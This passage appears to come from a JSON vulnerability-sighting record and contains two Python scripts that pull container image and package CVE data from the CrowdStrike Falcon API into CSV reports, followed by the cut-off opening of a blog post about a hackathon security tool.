2024-01-01\n\n # Images affected by a specific CVE\n python3 falcon-image-assessment-report.py --cve CVE-2024-1234\n\n # Only running containers\n python3 falcon-image-assessment-report.py --running-only\n\n # Expand to one row per CVE (for per-vulnerability filtering)\n python3 falcon-image-assessment-report.py --expand-vulns --severity critical\n\n # Save output\n python3 falcon-image-assessment-report.py --output /tmp/images.csv\n\"\"\"\n\nimport sys\nimport os\nimport json\nimport subprocess\nimport requests\nimport csv\nimport argparse\nfrom datetime import datetime, timezone, timedelta\nfrom typing import Optional\n\n\n# \u2500\u2500 Auth boilerplate \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef get_falcon_profile() -> str:\n profile = os.getenv('FALCON_PROFILE')\n if profile:\n return profile\n for path in ['.claude/memory/active-cid.txt',\n os.path.expanduser('~/.claude/projects/-Users-ykwan-Documents-code-knowledgebase/memory/active-cid.txt')]:\n try:\n with open(path) as f:\n for line in f:\n if line.startswith('profile='):\n return line.strip().split('=', 1)[1]\n except FileNotFoundError:\n continue\n return 'default'\n\n\ndef get_keychain_password(service: str, account: str, profile: Optional[str] = None) -> Optional[str]:\n if profile is None:\n profile = get_falcon_profile()\n try:\n result = subprocess.run(\n ['security', 'find-generic-password', '-s', service, '-a', profile, '-w'],\n capture_output=True, text=True, check=True)\n return result.stdout.strip()\n except subprocess.CalledProcessError:\n pass\n if profile == 'default':\n try:\n result = subprocess.run(\n ['security', 'find-generic-password', '-s', 'crowdstrike-falcon-api', '-a', account, '-w'],\n capture_output=True, text=True, check=True)\n return result.stdout.strip()\n except subprocess.CalledProcessError:\n pass\n return None\n\n\ndef get_oauth_token(base_url=\"https://api.crowdstrike.com\", profile=None):\n if profile is None:\n profile = get_falcon_profile()\n client_id = get_keychain_password(\"falcon-client-id\", \"client-id\", profile)\n client_secret = get_keychain_password(\"falcon-client-secret\", \"client-secret\", profile)\n if not client_id or not client_secret:\n print(f\"Credentials not found for profile: {profile}\")\n print(f\"Run: /cid add {profile}\")\n sys.exit(1)\n url = f\"{base_url}/oauth2/token\"\n data = {\"client_id\": client_id, \"client_secret\": client_secret}\n resp = requests.post(url, headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data=data)\n if resp.status_code != 201:\n print(f\"Auth failed: {resp.status_code} {resp.text}\")\n sys.exit(1)\n return resp.json()[\"access_token\"]\n\n\n# \u2500\u2500 API helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef fetch_images_page(token, fql_filter, offset, limit, expand_vulns, base_url):\n \"\"\"Single page from /container-security/combined/images/export/v1\"\"\"\n url = f\"{base_url}/container-security/combined/images/export/v1\"\n params = {\n \"limit\": limit,\n \"offset\": offset,\n \"expand_vulnerabilities\": \"true\" if expand_vulns else \"false\",\n \"expand_detections\": \"false\",\n \"sort\": \"last_seen.desc\",\n }\n if fql_filter:\n params[\"filter\"] = fql_filter\n headers = {\"Authorization\": f\"Bearer {token}\"}\n resp = requests.get(url, headers=headers, params=params)\n if resp.status_code != 200:\n print(f\" API error {resp.status_code}: {resp.text[:300]}\")\n return [], 0\n body = resp.json()\n resources = body.get(\"resources\") or []\n total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(resources))\n return resources, total\n\n\ndef fetch_all_images(token, fql_filter, expand_vulns, base_url, page_size=500):\n \"\"\"Paginate through all matching images.\"\"\"\n all_images = []\n offset = 0\n total = None\n while True:\n batch, total = fetch_images_page(token, fql_filter, offset, page_size, expand_vulns, base_url)\n if not batch:\n break\n all_images.extend(batch)\n print(f\" Fetched {len(all_images)} / {total}\", end=\"\\r\")\n if len(all_images) >= total or len(batch) < page_size:\n break\n offset += page_size\n print()\n return all_images, total\n\n\n# \u2500\u2500 Flattening \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef safe_get(d, *keys, default=\"\"):\n \"\"\"Nested dict get with default.\"\"\"\n for k in keys:\n if not isinstance(d, dict):\n return default\n d = d.get(k, default)\n return d if d != \"\" or default == \"\" else default\n\n\ndef flatten_image_base(img):\n \"\"\"Extract all standard image fields into a flat dict.\"\"\"\n # Vulnerability counts - API may return nested or flat depending on endpoint\n vuln = img.get(\"vulnerabilities\") or {}\n if isinstance(vuln, list):\n # Expanded mode - list of CVE objects; summarise counts\n sev_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"negligible\": 0}\n for v in vuln:\n s = (v.get(\"severity\") or \"\").lower()\n if s in sev_counts:\n sev_counts[s] += 1\n vuln_summary = sev_counts\n vuln_list = vuln\n else:\n vuln_summary = vuln\n vuln_list = []\n\n detection = img.get(\"detections\") or {}\n\n # Build labels - present if API returns them; not FQL-filterable today\n labels = img.get(\"labels\") or img.get(\"build_labels\") or {}\n labels_str = \"; \".join(f\"{k}={v}\" for k, v in labels.items()) if isinstance(labels, dict) else str(labels)\n\n row = {\n # Identity\n \"image_id\": img.get(\"id\") or img.get(\"image_id\", \"\"),\n \"image_digest\": img.get(\"image_digest\", \"\"),\n \"registry\": img.get(\"registry\", \"\"),\n \"repository\": img.get(\"repository\", \"\"),\n \"tag\": img.get(\"tag\", \"\"),\n \"source\": img.get(\"source\", \"\"),\n # Properties\n \"arch\": img.get(\"arch\", \"\"),\n \"base_os\": img.get(\"base_os\", \"\"),\n \"multi_arch\": img.get(\"multi_arch\", \"\"),\n # Runtime\n \"container_id\": img.get(\"container_id\", \"\"),\n \"container_running_status\": img.get(\"container_running_status\", \"\"),\n # Timestamps\n \"first_seen\": img.get(\"first_seen\", \"\"),\n \"last_seen\": img.get(\"last_seen\", \"\"),\n # Scores\n \"cps_rating\": img.get(\"highest_cps_current_rating\", \"\"),\n # Vulnerabilities\n \"vuln_critical\": vuln_summary.get(\"critical\", 0),\n \"vuln_high\": vuln_summary.get(\"high\", 0),\n \"vuln_medium\": vuln_summary.get(\"medium\", 0),\n \"vuln_low\": vuln_summary.get(\"low\", 0),\n \"vuln_negligible\": vuln_summary.get(\"negligible\", 0),\n \"vuln_total\": img.get(\"vulnerability_count\", sum(vuln_summary.get(s, 0) for s in [\"critical\",\"high\",\"medium\",\"low\",\"negligible\"])),\n \"highest_vuln_severity\": img.get(\"highest_vulnerability_severity\", \"\"),\n # Detections\n \"detection_count\": img.get(\"detection_count\", safe_get(detection, \"total\")),\n \"highest_detection_severity\": img.get(\"highest_detection_severity\", \"\"),\n # Packages / layers\n \"package_count\": img.get(\"packages\", \"\"),\n \"layers_with_vulns\": img.get(\"layers_with_vulnerabilities\", \"\"),\n # Build metadata\n \"build_labels\": labels_str,\n }\n return row, vuln_list\n\n\ndef expand_vuln_rows(base_row, vuln_list):\n \"\"\"Return one row per CVE for expanded mode.\"\"\"\n if not vuln_list:\n return [base_row]\n rows = []\n for v in vuln_list:\n row = dict(base_row)\n row[\"cve_id\"] = v.get(\"cve_id\", \"\")\n row[\"cve_severity\"] = v.get(\"severity\", \"\")\n row[\"cvss_score\"] = v.get(\"cvss_score\", \"\")\n row[\"cve_description\"] = v.get(\"description\", \"\")\n row[\"fix_status\"] = v.get(\"fix_status\", \"\")\n row[\"remediation\"] = v.get(\"remediation\", \"\")\n row[\"exploited_status\"] = v.get(\"exploited_status\", \"\")\n row[\"package_name\"] = v.get(\"package_name\", \"\")\n row[\"package_version\"] = v.get(\"package_version\", \"\")\n row[\"package_path\"] = v.get(\"package_path\", \"\")\n rows.append(row)\n return rows\n\n\n# \u2500\u2500 FQL filter builder \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef build_fql(args):\n parts = []\n if args.registry:\n parts.append(f\"registry:'{args.registry}'\")\n if args.repository:\n parts.append(f\"repository:'{args.repository}'\")\n if args.tag:\n parts.append(f\"tag:'{args.tag}'\")\n if args.severity:\n parts.append(f\"vulnerability_severity:'{args.severity}'\")\n if args.cve:\n parts.append(f\"cve_id:'{args.cve}'\")\n if args.running_only:\n parts.append(\"container_running_status:true\")\n if args.last_scanned_after:\n ts = args.last_scanned_after\n if len(ts) == 10: # date only \u2192 add time\n ts += \"T00:00:00Z\"\n parts.append(f\"last_seen:>='{ts}'\")\n if args.last_scanned_before:\n ts = args.last_scanned_before\n if len(ts) == 10:\n ts += \"T23:59:59Z\"\n parts.append(f\"last_seen:<='{ts}'\")\n return \"+\".join(parts) if parts else None\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Export Falcon Container Image Assessment data to CSV with ALL fields.\")\n parser.add_argument(\"--profile\", help=\"CID profile (default: active profile)\")\n parser.add_argument(\"--registry\", help=\"Filter by registry (e.g. myregistry.azurecr.io)\")\n parser.add_argument(\"--repository\", help=\"Filter by repository name\")\n parser.add_argument(\"--tag\", help=\"Filter by image tag\")\n parser.add_argument(\"--severity\", choices=[\"critical\",\"high\",\"medium\",\"low\"],\n help=\"Filter by highest vulnerability severity\")\n parser.add_argument(\"--cve\", help=\"Filter images affected by a specific CVE\")\n parser.add_argument(\"--running-only\", action=\"store_true\",\n help=\"Only include currently running containers\")\n parser.add_argument(\"--last-scanned-after\", metavar=\"DATE\",\n help=\"Only images scanned after this date (YYYY-MM-DD or ISO8601)\")\n parser.add_argument(\"--last-scanned-before\", metavar=\"DATE\",\n help=\"Only images scanned before this date (YYYY-MM-DD or ISO8601)\")\n parser.add_argument(\"--expand-vulns\", action=\"store_true\",\n help=\"One row per CVE (instead of one row per image)\")\n parser.add_argument(\"--output\", \"-o\", default=\"-\",\n help=\"Output CSV file path (default: stdout)\")\n parser.add_argument(\"--limit\", type=int, default=5000,\n help=\"Max images to fetch (default: 5000)\")\n args = parser.parse_args()\n\n profile = args.profile or get_falcon_profile()\n region = get_keychain_password(\"falcon-cloud-region\", \"region\", profile) or \"us-1\"\n base_url = \"https://api.crowdstrike.com\" if region == \"us-1\" else f\"https://api.{region}.crowdstrike.com\"\n\n print(f\"=== Falcon Image Assessment Report ===\", file=sys.stderr)\n print(f\"Profile: {profile} Region: {region}\", file=sys.stderr)\n\n token = get_oauth_token(base_url, profile=profile)\n print(\"\u2713 Authenticated\", file=sys.stderr)\n\n fql = build_fql(args)\n if fql:\n print(f\"Filter: {fql}\", file=sys.stderr)\n\n print(\"Fetching images...\", file=sys.stderr)\n images, total = fetch_all_images(token, fql, args.expand_vulns, base_url,\n page_size=min(500, args.limit))\n if total and len(images) < total:\n print(f\"\u26a0 Fetched {len(images)} of {total} total (increase --limit to get all)\", file=sys.stderr)\n print(f\"\u2713 {len(images)} images retrieved\", file=sys.stderr)\n\n if not images:\n print(\"No images found matching filters.\", file=sys.stderr)\n sys.exit(0)\n\n # Build rows\n all_rows = []\n for img in images:\n base_row, vuln_list = flatten_image_base(img)\n if args.expand_vulns:\n all_rows.extend(expand_vuln_rows(base_row, vuln_list))\n else:\n all_rows.append(base_row)\n\n # Write CSV\n fieldnames = list(all_rows[0].keys())\n\n out = open(args.output, \"w\", newline=\"\") if args.output != \"-\" else sys.stdout\n writer = csv.DictWriter(out, fieldnames=fieldnames, extrasaction=\"ignore\")\n writer.writeheader()\n writer.writerows(all_rows)\n if args.output != \"-\":\n out.close()\n print(f\"\u2713 Written to {args.output} ({len(all_rows)} rows)\", file=sys.stderr)\n else:\n print(f\"\\n\u2713 {len(all_rows)} rows written\", file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n#!/usr/bin/env python3\n\"\"\"\nFalcon Package Vulnerability Report - Exploded CVE Format\nOne row per (package \u00d7 CVE) combination. Fixes the \"combined fields\" CSV problem.\n\nFixes:\n - Package Vulnerabilities CSV combines all CVE IDs into one field \u2192 each CVE = own row\n - Can't filter by a specific CVE to see every affected package \u2192 use --cve\n - Missing image/container context per package \u2192 includes image list per package+CVE\n - CVE descriptions and remediations combined \u2192 each in its own column\n\nUsage:\n # All packages with vulnerabilities\n python3 falcon-package-cve-report.py\n\n # See every package affected by a specific CVE\n python3 falcon-package-cve-report.py --cve CVE-2024-1234\n\n # Critical and high only\n python3 falcon-package-cve-report.py --severity critical\n python3 falcon-package-cve-report.py --severity high\n\n # Fixable vulnerabilities only\n python3 falcon-package-cve-report.py --fix-available\n\n # Filter by registry (to scope to Azure Container Apps images)\n python3 falcon-package-cve-report.py --registry myregistry.azurecr.io\n\n # Save output\n python3 falcon-package-cve-report.py --cve CVE-2024-1234 --output /tmp/cve-impact.csv\n\"\"\"\n\nimport sys\nimport os\nimport json\nimport subprocess\nimport requests\nimport csv\nimport argparse\nfrom typing import Optional\n\n\n# \u2500\u2500 Auth boilerplate \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef get_falcon_profile() -> str:\n profile = os.getenv('FALCON_PROFILE')\n if profile:\n return profile\n for path in ['.claude/memory/active-cid.txt',\n os.path.expanduser('~/.claude/projects/-Users-ykwan-Documents-code-knowledgebase/memory/active-cid.txt')]:\n try:\n with open(path) as f:\n for line in f:\n if line.startswith('profile='):\n return line.strip().split('=', 1)[1]\n except FileNotFoundError:\n continue\n return 'default'\n\n\ndef get_keychain_password(service: str, account: str, profile: Optional[str] = None) -> Optional[str]:\n if profile is None:\n profile = get_falcon_profile()\n try:\n result = subprocess.run(\n ['security', 'find-generic-password', '-s', service, '-a', profile, '-w'],\n capture_output=True, text=True, check=True)\n return result.stdout.strip()\n except subprocess.CalledProcessError:\n pass\n if profile == 'default':\n try:\n result = subprocess.run(\n ['security', 'find-generic-password', '-s', 'crowdstrike-falcon-api', '-a', account, '-w'],\n capture_output=True, text=True, check=True)\n return result.stdout.strip()\n except subprocess.CalledProcessError:\n pass\n return None\n\n\ndef get_oauth_token(base_url=\"https://api.crowdstrike.com\", profile=None):\n if profile is None:\n profile = get_falcon_profile()\n client_id = get_keychain_password(\"falcon-client-id\", \"client-id\", profile)\n client_secret = get_keychain_password(\"falcon-client-secret\", \"client-secret\", profile)\n if not client_id or not client_secret:\n print(f\"Credentials not found for profile: {profile}\")\n print(f\"Run: /cid add {profile}\")\n sys.exit(1)\n url = f\"{base_url}/oauth2/token\"\n data = {\"client_id\": client_id, \"client_secret\": client_secret}\n resp = requests.post(url, headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data=data)\n if resp.status_code != 201:\n print(f\"Auth failed: {resp.status_code} {resp.text}\")\n sys.exit(1)\n return resp.json()[\"access_token\"]\n\n\n# \u2500\u2500 API: Package export (with embedded CVEs) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef fetch_packages_page(token, fql_filter, offset, limit, base_url):\n \"\"\"GET /container-security/combined/packages-export/v1\"\"\"\n url = f\"{base_url}/container-security/combined/packages-export/v1\"\n params = {\"limit\": limit, \"offset\": offset}\n if fql_filter:\n params[\"filter\"] = fql_filter\n headers = {\"Authorization\": f\"Bearer {token}\"}\n resp = requests.get(url, headers=headers, params=params)\n if resp.status_code != 200:\n print(f\" API error {resp.status_code}: {resp.text[:400]}\", file=sys.stderr)\n return [], 0\n body = resp.json()\n resources = body.get(\"resources\") or []\n total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(resources))\n return resources, total\n\n\ndef fetch_all_packages(token, fql_filter, base_url, page_size=500):\n all_pkgs = []\n offset = 0\n total = None\n while True:\n batch, total = fetch_packages_page(token, fql_filter, offset, page_size, base_url)\n if not batch:\n break\n all_pkgs.extend(batch)\n print(f\" Fetched {len(all_pkgs)} / {total}\", end=\"\\r\", file=sys.stderr)\n if len(all_pkgs) >= total or len(batch) < page_size:\n break\n offset += page_size\n print(file=sys.stderr)\n return all_pkgs, total\n\n\n# \u2500\u2500 API: CVE-specific vulnerability info (images + packages per CVE) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef fetch_vuln_info(token, cve_id, base_url, limit=500):\n \"\"\"\n GET /container-security/combined/vulnerabilities-info/v1\n Returns package + image data for a single CVE.\n Use this for --cve mode to get the most complete picture.\n \"\"\"\n url = f\"{base_url}/container-security/combined/vulnerabilities-info/v1\"\n all_results = []\n offset = 0\n while True:\n params = {\"cve_id\": cve_id, \"limit\": limit, \"offset\": offset}\n headers = {\"Authorization\": f\"Bearer {token}\"}\n resp = requests.get(url, headers=headers, params=params)\n if resp.status_code != 200:\n print(f\" vuln-info error {resp.status_code}: {resp.text[:300]}\", file=sys.stderr)\n break\n body = resp.json()\n batch = body.get(\"resources\") or []\n all_results.extend(batch)\n total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(batch))\n if len(all_results) >= total or len(batch) < limit:\n break\n offset += limit\n return all_results\n\n\n# \u2500\u2500 Row builders \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef explode_package_to_rows(pkg):\n \"\"\"\n Convert one package record (with embedded vulnerabilities list) into\n N rows, one per CVE.\n \"\"\"\n # Package-level fields\n base = {\n \"package_name\": pkg.get(\"package_name\") or pkg.get(\"name\", \"\"),\n \"package_version\": pkg.get(\"package_version\") or pkg.get(\"version\", \"\"),\n \"package_type\": pkg.get(\"type\", \"\"),\n \"package_path\": pkg.get(\"package_path\") or pkg.get(\"path\", \"\"),\n \"license\": pkg.get(\"license\", \"\"),\n \"fix_status\": pkg.get(\"fix_status\", \"\"),\n \"running_images_count\": pkg.get(\"running_images_count\", \"\"),\n \"all_images_count\": pkg.get(\"images_count\", \"\"),\n # Image context - API may return a list of images for this package\n \"affected_registries\": \"; \".join(set(\n i.get(\"registry\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"registry\")\n )),\n \"affected_repositories\": \"; \".join(set(\n i.get(\"repository\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"repository\")\n )),\n \"affected_image_ids\": \"; \".join(\n i.get(\"image_id\") or i.get(\"id\", \"\") for i in (pkg.get(\"images\") or [])[:20]\n ),\n \"affected_image_tags\": \"; \".join(\n f\"{i.get('repository','')}:{i.get('tag','')}\" for i in (pkg.get(\"images\") or [])[:20]\n ),\n \"affected_container_ids\": \"; \".join(\n i.get(\"container_id\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"container_id\")\n ),\n }\n\n vulns = pkg.get(\"vulnerabilities\") or pkg.get(\"cve_ids\") or []\n\n if not vulns:\n # No CVE data embedded - return one row with empty CVE fields\n row = dict(base)\n row.update({\n \"cve_id\": \"\",\n \"severity\": \"\",\n \"cvss_score\": \"\",\n \"description\": \"\",\n \"remediation\": \"\",\n \"fix_available\": \"\",\n \"exploited_status\": \"\",\n \"is_zero_day\": \"\",\n \"published_date\": \"\",\n })\n return [row]\n\n rows = []\n for v in vulns:\n # vulns may be strings (CVE IDs) or dicts depending on endpoint\n if isinstance(v, str):\n row = dict(base)\n row.update({\n \"cve_id\": v,\n \"severity\": \"\",\n \"cvss_score\": \"\",\n \"description\": \"\",\n \"remediation\": \"\",\n \"fix_available\": \"\",\n \"exploited_status\": \"\",\n \"is_zero_day\": \"\",\n \"published_date\": \"\",\n })\n else:\n row = dict(base)\n row.update({\n \"cve_id\": v.get(\"cve_id\", \"\"),\n \"severity\": v.get(\"severity\", \"\"),\n \"cvss_score\": v.get(\"cvss_score\", \"\"),\n \"description\": v.get(\"description\", \"\"),\n \"remediation\": v.get(\"remediation\", \"\"),\n \"fix_available\": v.get(\"fix_status\", \"\") or base[\"fix_status\"],\n \"exploited_status\": v.get(\"exploited_status\", \"\"),\n \"is_zero_day\": v.get(\"is_zero_day\", \"\"),\n \"published_date\": v.get(\"published_date\", \"\"),\n })\n rows.append(row)\n return rows\n\n\ndef rows_from_vuln_info(cve_id, resources):\n \"\"\"\n Build rows from /vulnerabilities-info/v1 response.\n Each resource is a package with embedded image list.\n \"\"\"\n rows = []\n for r in resources:\n row = {\n \"cve_id\": cve_id,\n \"severity\": r.get(\"severity\", \"\"),\n \"cvss_score\": r.get(\"cvss_score\", \"\"),\n \"description\": r.get(\"description\", \"\"),\n \"remediation\": r.get(\"remediation\", \"\"),\n \"fix_available\": r.get(\"fix_status\", \"\"),\n \"exploited_status\": r.get(\"exploited_status\", \"\"),\n \"is_zero_day\": r.get(\"is_zero_day\", \"\"),\n \"published_date\": r.get(\"published_date\", \"\"),\n \"package_name\": r.get(\"package_name\", \"\"),\n \"package_version\": r.get(\"package_version\", \"\"),\n \"package_type\": r.get(\"package_type\") or r.get(\"type\", \"\"),\n \"package_path\": r.get(\"package_path\", \"\"),\n \"license\": r.get(\"license\", \"\"),\n \"running_images_count\": r.get(\"running_images_count\", \"\"),\n \"all_images_count\": r.get(\"images_count\", \"\"),\n # Affected images list\n \"affected_registries\": \"; \".join(set(\n i.get(\"registry\", \"\") for i in (r.get(\"images\") or []) if i.get(\"registry\")\n )),\n \"affected_repositories\": \"; \".join(set(\n i.get(\"repository\", \"\") for i in (r.get(\"images\") or []) if i.get(\"repository\")\n )),\n \"affected_image_tags\": \"; \".join(\n f\"{i.get('repository','')}:{i.get('tag','')}\" for i in (r.get(\"images\") or [])[:30]\n ),\n \"affected_image_ids\": \"; \".join(\n i.get(\"image_id\") or i.get(\"id\", \"\") for i in (r.get(\"images\") or [])[:30]\n ),\n \"affected_container_ids\": \"; \".join(\n i.get(\"container_id\", \"\") for i in (r.get(\"images\") or []) if i.get(\"container_id\")\n ),\n }\n rows.append(row)\n return rows\n\n\n# \u2500\u2500 FQL builder \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef build_fql(args):\n parts = []\n if args.severity:\n parts.append(f\"severity:'{args.severity}'\")\n if args.registry:\n # package API filters by image metadata\n parts.append(f\"registry:'{args.registry}'\")\n if args.cve:\n parts.append(f\"cveid:'{args.cve}'\")\n if args.fix_available:\n parts.append(\"fix_status:'TRUE'\")\n return \"+\".join(parts) if parts else None\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Export package vulnerabilities as one row per CVE (fixes combined-fields CSV).\")\n parser.add_argument(\"--profile\", help=\"CID profile\")\n parser.add_argument(\"--cve\", help=\"Show all packages affected by this CVE (e.g. CVE-2024-1234)\")\n parser.add_argument(\"--severity\", choices=[\"critical\",\"high\",\"medium\",\"low\"],\n help=\"Filter by vulnerability severity\")\n parser.add_argument(\"--registry\", help=\"Filter by image registry\")\n parser.add_argument(\"--fix-available\", action=\"store_true\",\n help=\"Only include vulnerabilities with a fix available\")\n parser.add_argument(\"--output\", \"-o\", default=\"-\",\n help=\"Output CSV path (default: stdout)\")\n parser.add_argument(\"--limit\", type=int, default=5000,\n help=\"Max packages to fetch (default: 5000)\")\n args = parser.parse_args()\n\n profile = args.profile or get_falcon_profile()\n region = get_keychain_password(\"falcon-cloud-region\", \"region\", profile) or \"us-1\"\n base_url = \"https://api.crowdstrike.com\" if region == \"us-1\" else f\"https://api.{region}.crowdstrike.com\"\n\n print(\"=== Falcon Package CVE Report ===\", file=sys.stderr)\n print(f\"Profile: {profile} Region: {region}\", file=sys.stderr)\n\n token = get_oauth_token(base_url, profile=profile)\n print(\"\u2713 Authenticated\", file=sys.stderr)\n\n all_rows = []\n\n if args.cve:\n # CVE-first mode: use vulnerabilities-info endpoint for richest data\n print(f\"Fetching all packages affected by {args.cve}...\", file=sys.stderr)\n resources = fetch_vuln_info(token, args.cve, base_url)\n print(f\"\u2713 {len(resources)} package records found\", file=sys.stderr)\n all_rows = rows_from_vuln_info(args.cve, resources)\n else:\n # Package-first mode: dump all packages with exploded CVEs\n fql = build_fql(args)\n if fql:\n print(f\"Filter: {fql}\", file=sys.stderr)\n print(\"Fetching packages...\", file=sys.stderr)\n packages, total = fetch_all_packages(token, fql, base_url,\n page_size=min(500, args.limit))\n if total and len(packages) < total:\n print(f\"\u26a0 Fetched {len(packages)} of {total} total\", file=sys.stderr)\n print(f\"\u2713 {len(packages)} packages retrieved, exploding CVEs...\", file=sys.stderr)\n for pkg in packages:\n all_rows.extend(explode_package_to_rows(pkg))\n\n if not all_rows:\n print(\"No results found.\", file=sys.stderr)\n sys.exit(0)\n\n # Apply post-filter for severity (can't always push to FQL in package endpoint)\n if args.severity and not args.cve:\n before = len(all_rows)\n all_rows = [r for r in all_rows if r.get(\"severity\", \"\").lower() == args.severity]\n print(f\" Severity filter: {before} \u2192 {len(all_rows)} rows\", file=sys.stderr)\n\n if args.fix_available:\n before = len(all_rows)\n all_rows = [r for r in all_rows\n if str(r.get(\"fix_available\", \"\")).upper() in (\"TRUE\", \"YES\", \"1\")]\n print(f\" Fix-available filter: {before} \u2192 {len(all_rows)} rows\", file=sys.stderr)\n\n fieldnames = list(all_rows[0].keys())\n out = open(args.output, \"w\", newline=\"\") if args.output != \"-\" else sys.stdout\n writer = csv.DictWriter(out, fieldnames=fieldnames, extrasaction=\"ignore\")\n writer.writeheader()\n writer.writerows(all_rows)\n if args.output != \"-\":\n out.close()\n print(f\"\u2713 Written to {args.output} ({len(all_rows)} rows)\", file=sys.stderr)\n else:\n print(f\"\\n\u2713 {len(all_rows)} rows written\", file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n main()\n", "creation_timestamp": "2026-05-11T14:19:10.000000Z"}, {"uuid": "321f8296-1365-4a0c-ac17-e41842de6917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/SamChawla/c8bcbdda8b70e6e1a44bd777f5a4cfae", "content": " # I Taught SQL to Read My Security Tools \u2014 Here's What Happened\n\n ### A beginner-friendly story about CoralSentinel, a hackathon proof-of-concept that turns five different security tools into one giant spreadsheet you can ask questions.\n\n ---\n\n > **Before we start \u2014 what this is and 